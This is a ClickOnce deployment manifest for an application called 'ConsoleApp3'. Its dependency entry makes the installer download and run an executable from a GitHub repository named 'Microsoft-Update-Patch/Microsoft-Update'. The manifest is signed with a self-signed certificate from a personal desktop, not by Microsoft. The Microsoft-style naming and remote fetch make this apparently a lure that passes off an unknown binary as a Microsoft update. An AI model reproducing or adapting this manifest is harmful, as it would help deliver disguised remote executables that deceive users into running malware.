<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">
  <assemblyIdentity name="ConsoleApp3.application" version="1.0.0.0" publicKeyToken="c9f3f11cf4bf85ba" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <description asmv2:publisher="ConsoleApp3" asmv2:product="ConsoleApp3" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <deployment install="false" mapFileExtensions="true" />
  <compatibleFrameworks xmlns="urn:schemas-microsoft-com:clickonce.v2">
    <framework targetVersion="4.7.2" profile="Full" supportedRuntime="4.0.30319" />
  </compatibleFrameworks>
  
  <dependency>
    <dependentAssembly dependencyType="install" codebase="https://github.com/Microsoft-Update-Patch/Microsoft-Update/raw/refs/heads/main/ConsoleApp3.exe" size="7179">
      <assemblyIdentity name="ConsoleApp3.exe" version="1.0.0.0" publicKeyToken="c9f3f11cf4bf85ba" language="neutral" processorArchitecture="msil" type="win32" />
      <hash>
        <dsig:Transforms>
          <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
        </dsig:Transforms>
        <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
        <dsig:DigestValue>t06SC2A/rncDHqbIHY4B7dCp8Y5C3kdhPHsLfM22bEg=</dsig:DigestValue>
      </hash>
    </dependentAssembly>
  </dependency>
  
  <publisherIdentity name="CN=DESKTOP-KHL9KVH\kitng" issuerKeyHash="a6e907d8929962aa674a7ba54c76db9bb407c363" />
  
  <Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#">
    <SignedInfo>
      <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" />
      <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha256" />
      <Reference URI="">
        <Transforms>
          <Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" />
          <Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" />
        </Transforms>
        <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
        <DigestValue>fpfka4LsibZJW2zlVcL1jSSjsnRjSaXZNuNRJJMXyZE=</DigestValue>
      </Reference>
    </SignedInfo>
    <SignatureValue>gTIviQYqz0Agb3kO1TuovkZPZrcU9z/4gJPIIz0hYJ3JiMhF08wHwBNtCKzdX6mLTyUnwE3TUqFaDV8IGekzD/khu2I2llZKuwcJdzppx+0dlDWvWGq/fTMPYrWGlJnmaoNDqk8hWrsNmQ094owpqG10jjKOI1p873K0uVONF7g=</SignatureValue>
    <KeyInfo Id="StrongNameKeyInfo">
      <KeyValue>
        <RSAKeyValue>
          <Modulus>vxKB1ML7jy1H74PveSqpL5P+9XTOj+fXQ3ohcUmZuLtz0x9AxLAm6VCLsjJrPH/4epEWRFbCANZGE158PoCZCHmIdIFHSSn1BVTgpazvFd6gzEmUBKv6p4mQRVpsWhqGIfOpLEDslLwdYuhhpNq3SVyx0AEVGySlE4Q9v3pcFKE=</Modulus>
          <Exponent>AQAB</Exponent>
        </RSAKeyValue>
      </KeyValue>
      <msrel:RelData xmlns:msrel="http://schemas.microsoft.com/windows/rel/2005/reldata">
        <r:license xmlns:r="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:as="http://schemas.microsoft.com/windows/pki/2005/Authenticode">
          <r:grant>
            <as:ManifestInformation Hash="91c917932451e336d9a5496374b2a3248df5c255e56c5b49b689ec826be4977e" Description="" Url="">
              <as:assemblyIdentity name="ConsoleApp3.application" version="1.0.0.0" publicKeyToken="c9f3f11cf4bf85ba" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />
            </as:ManifestInformation>
            <as:SignedBy />
            <as:AuthenticodePublisher>
              <as:X509SubjectName>CN=DESKTOP-KHL9KVH\kitng</as:X509SubjectName>
            </as:AuthenticodePublisher>
          </r:grant>
          <r:issuer>
            <Signature Id="AuthenticodeSignature" xmlns="http://www.w3.org/2000/09/xmldsig#">
              <SignedInfo>
                <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" />
                <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha256" />
                <Reference URI="">
                  <Transforms>
                    <Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" />
                    <Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" />
                  </Transforms>
                  <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
                  <DigestValue>EvDurMndGNEiSH2HGU4d+4frmpTFWwZvuR/0BBjA5Ps=</DigestValue>
                </Reference>
              </SignedInfo>
              <SignatureValue>cDQgXHnrf3m3dxw3JmrKQVJSZFAS4U8ZapjVn+q1kV+6HBYXBwuUOKlx0NpuSnm9VXzXgufZPv2kV5IwkONm7lznxyWuLex8JPoxi0D0shIIUd0LoB4j02e72+CME/Jc3pW3lBf/WRoFw9tphpXCV/CiEr3D/1LftIC3NKgLCSE=</SignatureValue>
              <KeyInfo>
                <KeyValue>
                  <RSAKeyValue>
                    <Modulus>vxKB1ML7jy1H74PveSqpL5P+9XTOj+fXQ3ohcUmZuLtz0x9AxLAm6VCLsjJrPH/4epEWRFbCANZGE158PoCZCHmIdIFHSSn1BVTgpazvFd6gzEmUBKv6p4mQRVpsWhqGIfOpLEDslLwdYuhhpNq3SVyx0AEVGySlE4Q9v3pcFKE=</Modulus>
                    <Exponent>AQAB</Exponent>
                  </RSAKeyValue>
                </KeyValue>
                <X509Data>
                  <X509Certificate>MIIB7TCCAVagAwIBAgIQTI3lfHBv66VHqm2MjYhUuzANBgkqhkiG9w0BAQsFADA3
          MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGU2VsZkNhMXoxEzARBgNVBAMMCk9yaWdp
          bmFsX1NFbDAeFw0yMDA4MTUwMzU1MjJaFw0zMDA4MTUwMzU1MjJaMDcxCzAJBgNV
          BAYTAlVTMRMwEQYDVQQDDApPcmFnb25hbF9TR2wwDQYJKoZIhvcNAQELBQADgYEA
          mO/AfF2aJwznLXcxri9RZzoquJpG8UNkDROivOjR07C5AZQs5Bl1fw4CgV3zOrmg
          ABphpr5vFoUPaopjKbDWwZR7yRHnZX56ZhOzBQOYURMsvDE9zTh2RBVoIQcw8Qbw
          8+2jIDmj2INrsBXaEKD9XYOvZXG6wReB4Pn6H8HXXh+NirQ=</X509Certificate>
                </X509Data>
              </KeyInfo>
            </Signature>
          </r:issuer>
        </r:license>
      </msrel:RelData>
    </KeyInfo>
  </Signature>
</asmv1:assembly>
